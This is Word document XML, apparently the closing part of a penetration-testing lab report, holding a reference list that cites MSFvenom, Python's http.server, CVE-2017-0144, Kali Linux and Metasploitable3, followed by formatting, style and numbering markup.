        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cheat Sheet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Retrieved from https://www.offensive-security.com/metasploit-unleashed/msfvenom/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529DE23F" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D3314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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Python HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD76C9" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Software Foundation. (n.d.). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>HTTP.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> module documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00D33140">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://docs.python.org/3/library/http.server.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FC2C613" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures (CVEs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E35A48F" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">National Institute of Standards and Technology (NIST). (2017). </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CVE-2017-0144: Microsoft SMBv1 Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF70419" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00D33140">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2017-0144</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2165208E" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9EA999" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive Security. (n.d.). </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Kali Linux Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Retrieved from https://www.kali.org/docs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7F926" w14:textId="3F2FE657" w:rsidR="00D33140" w:rsidRPr="00D33140" w:rsidRDefault="00D33140" w:rsidP="00D33140">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3140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. (n.d.). </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Metasploitable3 Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00D33140">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://github.com/rapid7/metasploitable3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B72C9C2" w14:textId="77777777" w:rsidR="00D33140" w:rsidRPr="00325596" w:rsidRDefault="00D33140" w:rsidP="00D3314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6E90554" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4BF144" w14:textId="77777777" w:rsidR="00325596" w:rsidRPr="00325596" w:rsidRDefault="00325596" w:rsidP="00325596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12ED2EDA" w14:textId="77777777" w:rsidR="00922EB2" w:rsidRDefault="00922EB2"/>
    <w:sectPr w:rsidR="00922EB2">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EBC7AD" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="00CF4DBF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6C0659C0" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="00CF4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E87332" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="00CF4DBF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2DCF1D13" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4DBF" w:rsidP="00CF4D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Bidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:id w:val="-414860578"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="0CCB7361" w14:textId="612F6E32" w:rsidR="00CF4DBF" w:rsidRPr="00CF4DBF" w:rsidRDefault="00CF4DBF">
        <w:pPr>
          <w:pStyle w:val="Header"/>
          <w:jc w:val="right"/>
          <w:rPr>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
        </w:pPr>
        <w:r w:rsidRPr="00CF4DBF">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00CF4DBF">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00CF4DBF">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00CF4DBF">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00CF4DBF">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="6F15F286" w14:textId="77777777" w:rsidR="00CF4DBF" w:rsidRDefault="00CF4D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538C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D707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177C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9AE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207AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54ACB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33382"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AE8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E1D30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62C6C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324532"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7F0F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9E7146"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98DC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664E0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7A28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8C7993"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8CE0D2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766E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="411C35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524662"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9E04F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E456AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="901E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B071E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B526310"/>
    <w:lvl w:ilvl="0" w:tplc="A32A34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9C5D4A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0227DAE"/>
    <w:lvl w:ilvl="0" w:tplc="F99EA63E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%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FB20FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF10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450A5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0962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4A07FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ECDAE5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1F5A00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0AA0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BC2489"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A02A16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CF5049"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7C0EA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065302">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1422602609">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1990936227">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2121340703">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="670446567">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1378507224">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1997412671">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2086880565">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1288318533">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="55398609">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1291741308">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="153306941">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1744527163">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1593508243">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="822698573">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1793550494">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1268272035">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1440180902">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="50269416">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1933512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596"/>
    <w:rsid w:val="0002280F"/>
    <w:rsid w:val="000870FB"/>
    <w:rsid w:val="000D6150"/>
    <w:rsid w:val="000E6129"/>
    <w:rsid w:val="001259A5"/>
    <w:rsid w:val="001A5749"/>
    <w:rsid w:val="002129D9"/>
    <w:rsid w:val="00234E63"/>
    <w:rsid w:val="002866C8"/>
    <w:rsid w:val="00325596"/>
    <w:rsid w:val="003E6359"/>
    <w:rsid w:val="0052728D"/>
    <w:rsid w:val="005336D3"/>
    <w:rsid w:val="0056260B"/>
    <w:rsid w:val="00573365"/>
    <w:rsid w:val="006B6068"/>
    <w:rsid w:val="006D6C1F"/>
    <w:rsid w:val="006F3C0E"/>
    <w:rsid w:val="00764FBD"/>
    <w:rsid w:val="007B1D10"/>
    <w:rsid w:val="007D03AE"/>
    <w:rsid w:val="00922EB2"/>
    <w:rsid w:val="00A4563E"/>
    <w:rsid w:val="00A45F4C"/>
    <w:rsid w:val="00A67E62"/>
    <w:rsid w:val="00B251DB"/>
    <w:rsid w:val="00B9260C"/>
    <w:rsid w:val="00C53BE1"/>
    <w:rsid w:val="00C63866"/>
    <w:rsid w:val="00CA229C"/>
    <w:rsid w:val="00CF4DBF"/>
    <w:rsid w:val="00D33140"/>
    <w:rsid w:val="00E66713"/>
    <w:rsid w:val="00F436C8"/>
    <w:rsid w:val="00FA24A9"/>
    <w:rsid w:val="00FF27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C713C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EAF54FE0-BB4B-4D57-98B1-3DDBA0D54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5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55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55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55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55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55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55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55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55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55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255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55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55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55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55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55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5596"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00325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5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55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55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5596"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00325596"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00325596"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00325596"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00325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5596"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00325596"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00325596"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0032559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33140"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D33140"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF4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4DBF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF4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4D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53391">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="235941600">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="517354791">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="528225485">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="552086450">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="790369221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="830372729">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="843858108">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="880288490">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
